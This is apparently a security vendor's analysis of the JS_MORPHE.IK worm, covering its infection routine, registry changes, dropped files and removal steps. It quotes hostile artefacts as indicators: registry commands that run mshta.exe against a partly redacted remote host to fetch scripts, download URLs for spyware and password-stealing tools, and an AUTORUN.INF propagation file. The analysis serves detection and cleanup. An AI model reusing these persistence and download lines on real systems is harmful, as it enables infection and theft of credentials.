Analysis by: Sabrina Lei Sioting

 PLATFORM:

Windows 2000, Windows XP, Windows Server 2003

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:

  • Threat Type: Worm

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Infection Channel: Copies itself in all available physical drives, Propagates via removable drives

This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It may be hosted on a website and run when a user accesses the said website.

It adds certain registry entries to disable the Task Manager. This action prevents users from terminating the malware process, which can usually be done via the Task Manager.

It drops an AUTORUN.INF file to automatically execute the copies it drops when a user accesses the drives of an affected system.

  TECHNICAL DETAILS

File Size: 17,408 bytes
File Type: HTML, HTM
Memory Resident: Yes
Initial Samples Received Date: 12 Apr 2012
Payload: Drops files, Connects to URLs/IPs, Downloads files, Terminates processes

Arrival Details

This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It may be hosted on a website and run when a user accesses the said website.

Installation

This worm drops and executes the following files:

  • %Desktop%\msn\d.tpl - same detection name
  • %Desktop%\msn\d.reg - detected as REG_MORPHE.A

(Note: %Desktop% is the current user's desktop, which is usually C:\Windows\Profiles\{user name}\Desktop on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Desktop on Windows NT, and C:\Documents and Settings\{User Name}\Desktop on Windows 2000, XP, and Server 2003.)

Autostart Technique

This worm adds the following registry entries to enable its automatic execution at every system startup:

HKEY_CLASSES_ROOT\WinRAR\shell\
open\command
{default} = ""%System%\mshta.exe\" "http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/nfiles/exec.php?t={current date and time};p=WinRar;f=%1\""

HKEY_CLASSES_ROOT\Directory\shell\
DOSAqui
{default} = "Abrir Carpeta"

HKEY_CLASSES_ROOT\Directory\shell\
DOSAqui\Command
{default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"

HKEY_CLASSES_ROOT\Drive\shell\
DOSAqui
{default} = "Abrir Unidad de Disco"

HKEY_CLASSES_ROOT\Drive\shell\
DOSAqui\Command
{default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"

Other System Modifications

This worm adds the following registry entries as part of its installation routine:

HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Main
Start Page = "http://mail-live.no-ip.info"

HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Main
Window Title = "::M0rPheU$:: v2.1"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\Terminal Server
fDenyTSConnections = "0"

It adds the following registry entries to disable the Task Manager:

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
DisableTaskMgr = "1"

Propagation

This worm drops an AUTORUN.INF file to automatically execute the copies it drops when a user accesses the drives of an affected system.

The said .INF file contains the following strings:

[autorun]
open=\"inf.exe\"
icon=\"%SystemRoot%\system32\SHELL32.dll,8\"
action=Abrir carpeta para ver archivos
shell\open=Abrir carpeta para ver archivos
shell\open\command=\"inf.exe\"
shell\open\default=^1

Process Termination

This worm terminates the following processes if found running in the affected system's memory:

  • avgnt.exe
  • avguard.exe
  • avshadow.exe
  • chrome.exe
  • firefox.exe
  • GoogleUpdate.exe
  • msnmsgr.exe
  • GoogleCrashHandler.exe
  • mailpv.exe

Dropping Routine

This worm drops the following files:

  • %User Profile%\Datos de programa\Microsoft\Internet Explorer\Quick Launch\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %Desktop%\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %System Root%\Documents and Settings\All Users\Desktop\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %System Root%\Documents and Settings\All Users\Start Menu\Programs\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Actualizaciones de Windows Live.lnk - detected as LNK_MORPHE.III
  • %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Detector de Spywares de Windows Live.lnk - detected as LNK_MORPHE.III
  • %User Startup%\Actualizaciones de Windows Live.lnk - detected as LNK_MORPHE.III
  • %User Startup%\Detector de Spywares de Windows Live.lnk - detected as LNK_MORPHE.III
  • %StartMenu%\Programs\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %StartMenu%\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
  • %%User Profile%\Recent\Windows Live Messenger.lnk - detected as LNK_MORPHE.III

(Note: %User Profile% is the current user's profile folder, which is usually C:\Windows\Profiles\{user name} on Windows 98 and ME, C:\WINNT\Profiles\{user name} on Windows NT, and C:\Documents and Settings\{user name} on Windows 2000, XP, and Server 2003.. %Desktop% is the current user's desktop, which is usually C:\Windows\Profiles\{user name}\Desktop on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Desktop on Windows NT, and C:\Documents and Settings\{User Name}\Desktop on Windows 2000, XP, and Server 2003.. %System Root% is the root folder, which is usually C:\. It is also where the operating system is located.. %User Startup% is the current user's Startup folder, which is usually C:\Windows\Profiles\{user name}\Start Menu\Programs\Startup on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Start Menu\Programs\Startup on Windows NT, and C:\Documents and Settings\{User name}\Start Menu\Programs\Startup.)

Download Routine

This worm connects to the following website(s) to download and execute a malicious file:

  • http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msn/msn.js

NOTES:

This worm drops the following files in all physical and removable drives found in the affected system:

  • inf.exe - detected as TSPY_SPYEKS.C
  • Windows Live Messenger.lnk - detected as LNK_MORPHE.III

It searches for subfolders in the following folders then drops a shortcut link as {folder name}.lnk:

  • {drive letter}
  • %Desktop%
  • %User Profile%\My Documents
  • %Start Menu%
  • %Start Menu%\Programs
  • %Start Menu%\Programas

It modifies the attributes of folders found into Hidden to trick the users that the folders have been deleted. The dropped shortcut links are detected as LNK_MORPHE.III.

It creates a duplicate copy of the following files with a different file name:

  • %Desktop%\msn\m2011.tt copied as %Desktop%\msn\m2011.exe
  • %Desktop%\msn\mailpv.tt copied as %Desktop%\msn\mailpv.exe

It then executes the copied files. As a result, malicious routines of the copied files are exhibited on the affected system.

This worm connects to the following URLs to download its components and renames them before storing in the affected system:

  • http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/key.tt - saved as %Desktop%\msn\inf.tt - detected as TSPY_SPYEKS.C
  • http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/mailer.js - saved as %Desktop%\msn\mailer.tpl - detected as JS_MAILER.AC
  • http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/mailpv.js - saved as %Desktop%\msn\mailpv.tt - detected as HKTL_MAILPASSVIE
  • http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/key.tt - saved as %Desktop%\msn\m2011.tt - detected as TSPY_SPYEKS.C
  • http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/morph.jpg - saved as %Desktop%\msn\M0rPheU$_Esta_Aqui.jpg
  • http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/MA.tt - saved as %Desktop%\msn\Mejores Amigos.zip - detected as LNK_MORPHEUS.VTG

It sends a ping command to the following IP addresses:

  • {BLOCKED}.{BLOCKED}.179.157
  • {BLOCKED}.{BLOCKED}.221.201

It changes the attribute of the folder %Desktop%\msn to Hidden.

  SOLUTION

Minimum Scan Engine: 9.200
FIRST VSAPI PATTERN FILE: 8.962.01
FIRST VSAPI PATTERN DATE: 02 May 2012
VSAPI OPR PATTERN File: 8.963.00
VSAPI OPR PATTERN Date: 02 May 2012

Step 1

For Windows XP and Windows Server 2003 users, before doing any scans, please make sure you disable System Restore to allow full scanning of your computer.

Step 2

Close all opened browser windows

Step 3

Remove malware files dropped/downloaded by JS_MORPHE.IK

    • REG_SCRDL.A
    • TSPY_SPYEKS.C
    • LNK_MORPHE.III
    • JS_MAILER.AC
    • HKTL_MAILPASSVIE
    • LNK_MORPHEUS.VTG

Step 4

Restart in Safe Mode

[ Learn More ]

Step 5

Delete this registry value

[ Learn More ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.

  • In HKEY_CLASSES_ROOT\WinRAR\shell\open\command
    • {default} = ""%System%\mshta.exe\" "http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/nfiles/exec.php?t={current date and time};p=WinRar;f=%1\""
  • In HKEY_CLASSES_ROOT\Directory\shell\DOSAqui
    • {default} = "Abrir Carpeta"
  • In HKEY_CLASSES_ROOT\Directory\shell\DOSAqui\Command
    • {default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
  • In HKEY_CLASSES_ROOT\Drive\shell\DOSAqui
    • {default} = "Abrir Unidad de Disco"
  • In HKEY_CLASSES_ROOT\Drive\shell\DOSAqui\Command
    • {default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
  • In HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
    • Start Page = "http://mail-live.no-ip.info"
  • In HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
    • Window Title = "::M0rPheU$:: v2.1"
  • In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    • fDenyTSConnections = "0"
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
    • DisableTaskMgr = "1"

Step 6

Search and delete AUTORUN.INF files created by JS_MORPHE.IK that contain these strings

[ Learn More ]
[autorun]
open=\"inf.exe\"
icon=\"%SystemRoot%\system32\SHELL32.dll,8\"
action=Abrir carpeta para ver archivos
shell\open=Abrir carpeta para ver archivos
shell\open\command=\"inf.exe\"
shell\open\default=^1

Step 7

Restart in normal mode and scan your computer with your Trend Micro product for files detected as JS_MORPHE.IK. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.


Did this description help? Tell us how we did.